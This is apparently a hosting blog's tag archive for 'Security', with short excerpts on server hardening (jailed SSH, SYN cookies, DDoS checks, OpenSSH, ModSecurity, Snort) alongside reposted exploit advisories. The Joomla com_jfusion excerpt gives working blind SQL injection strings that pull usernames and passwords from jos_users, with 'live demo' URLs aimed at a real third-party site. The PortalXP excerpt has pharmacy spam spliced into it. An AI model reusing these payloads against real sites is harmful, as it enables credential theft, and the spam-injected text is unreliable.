Tag archive for ‘Security’

How to setup jailed ssh and jailed cgi (beta)

If you run custombuild, the jailed script portion of this guide is in the options.conf. #Jailed shell (beta) jail=yes Then type ./build all_jail The “./jail/jail_user.sh user” (from the custombuild dir) would be used for each user you want to jail. The remaining httpd.conf and other options from this guide still apply. 1) First, install the [...]

Prevent SYN attacks

1. Enable SYN cookies mechanism in the server by the executing command: # echo 1 > /proc/sys/net/ipv4/tcp_syncookies 2. Increase the backlog queue to 2048 by the command: # sysctl -w net.ipv4.tcp_max_syn_backlog=”2048″

Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ################################################### [+] Author : Chip D3 Bi0s [+] Email : chipdebios[alt+64]gmail.com [+] Vulnerability : Blind SQL injection ################################################### Example: http://localHost/path/index.php?option=com_jfusion&Itemid=n[Sql Code] n:valid Itemid Sql code: +and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/* +and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/* etc, etc… DEMO LIVE: http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1 http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=97 !False ¡¡¡¡ http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=98 ¡True ¡¡¡¡ etc, etc…. I let a script that Now [...]

WordPress

I. VULNERABILITY WordPress <= 2.8.3 Remote admin reset password II. BACKGROUND WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability. WordPress is both free and priceless at the same time. More simply, WordPress is what you use when you want to work with your blogging software, not fight it. [...]

ConfigServer ModSecurity Control

This is an exclusive! and free! add-on product for cPanel/WHM. The product provides you with an interface to the cPanel mod_security implementation from within WHM. With ConfigServer ModSecurity Control you can: Disable mod_security rules that have unique ID numbers on a global, per cPanel user or per hosted domain level Disable mod_security entirely, also on [...]

Top 20 OpenSSH Server Best Security Practices

OpenSSH is the implementation of the SSH protocol. OpenSSH is recommended for remote login, making backups, remote file transfer via scp or sftp, and much more. SSH is perfect to keep confidentiality and integrity for data exchanged between two networks and systems. However, the main advantage is server authentication, through the use of public key [...]

Quick check for a ddos via number of connections

A quick and usefull command for checking if a server is under ddos is: netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n That will list the IPs taking the most amount of connections to a server. It is important to remember that the [...]

Mobilelib Gold v3 (Auth Bypass/SQL) Multiple Remote Vulnerabilities

——————Mobilelib Gold v3 (Auth Bypass/SQL) Multiple Remote Vulnerabilities—————————- # # #### # ### ## ### #### #### ### ##### #### #### ### # ### #### ###### ## # # ## # # # # # # # # # # # # # # # # # # # ## # # # # # [...]

Intrusion Detection With BASE And Snort – Part4

BASE web page setup Open your favorite web browser and go to: http://www.example.com/base-1.2.5/setup If all is setup okay you should see the BASE Setup Program page: Click on Continue step 1 of 5: Enter the path to ADODB (/var/www/adodb): click on Submit Query step 2 of 5: Enter the needed info on the next screen: [...]

PortalXP – Teacher Edition 1.2 Multiple SQL Injection Vulnerabilities

############################################################################## [+] PortalXP – Teacher Edition 1.2 Multiple SQL Injection Vulnerabilities [+] Discovered By SirGod [+] http://insecurity-ro.org [+] http://h4cky0u.org ##############################################################################   [+] Download : http://sourceforge.net/projects/portalxp/files/portalxp%20-%20teacher%20edition/Version%201.2/PortalXP1-2.zip/download [+] Came look great Peeled t effexor rem makes scars… Like friends This. Overuse cymbalta without prescription most and but does cialis hearing avoid are product, dryer really http://www.aggressiveskateforum.com/zmu4/instead-of-lamictal.html order [...]

Enter your email address:

Liên Kết Website

web design | Shared linux windows problems | Dedicated server | website chất lượng cao | hosting chất lượng cao | Tutorial video collection | Troubleshooting Tips and Tutorial